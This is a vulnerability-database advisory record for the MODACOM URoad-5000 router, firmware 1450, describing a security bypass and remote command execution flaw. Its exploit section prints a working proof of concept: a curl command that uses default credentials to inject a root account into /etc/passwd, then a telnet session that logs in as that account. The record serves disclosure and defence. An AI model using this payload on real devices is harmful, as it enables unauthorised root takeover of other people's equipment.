ID

VAR-E-201106-0430


TITLE

MODACOM URoad-5000 Security Bypass Vulnerability and Remote Command Execution Vulnerability

Trust: 0.3

sources: BID: 48089

DESCRIPTION

MODACOM URoad-5000 is prone to a security-bypass vulnerability and a remote command-execution vulnerability.
An attacker can exploit these issues to bypass certain security restrictions and execute arbitrary commands on the affected device.
MODACOM URoad-5000 firmware version 1450 is vulnerable; other versions may also be affected.

Trust: 0.3

sources: BID: 48089

AFFECTED PRODUCTS

vendor:modacommodel:uroad-5000scope:eqversion:1450

Trust: 0.3

sources: BID: 48089

EXPLOIT

Attackers may exploit these issues by using readily available network utilities.
The following proof of concept is available:
$curl --basic -u "engineer:engineer" -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" 192.168.100.254/goform/SystemCommand
$telnet www.example.com
Trying www.example.com.
Connected to www.example.com
modacom login: r00t
Password: boza
BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
Enter 'help' for a list of built-in commands

Trust: 0.3

sources: BID: 48089

PRICE

Free

Trust: 0.3

sources: BID: 48089

TYPE

Design Error

Trust: 0.3

sources: BID: 48089

CREDITS

Alex Stanev

Trust: 0.3

sources: BID: 48089

EXTERNAL IDS

db:BIDid:48089

Trust: 0.3

sources: BID: 48089

REFERENCES

url:http://www.modacom.co.kr

Trust: 0.3

sources: BID: 48089

SOURCES

db:BIDid:48089

LAST UPDATE DATE

2022-07-27T09:40:45.481000+00:00


SOURCES UPDATE DATE

db:BIDid:48089date:2011-06-02T00:00:00

SOURCES RELEASE DATE

db:BIDid:48089date:2011-06-02T00:00:00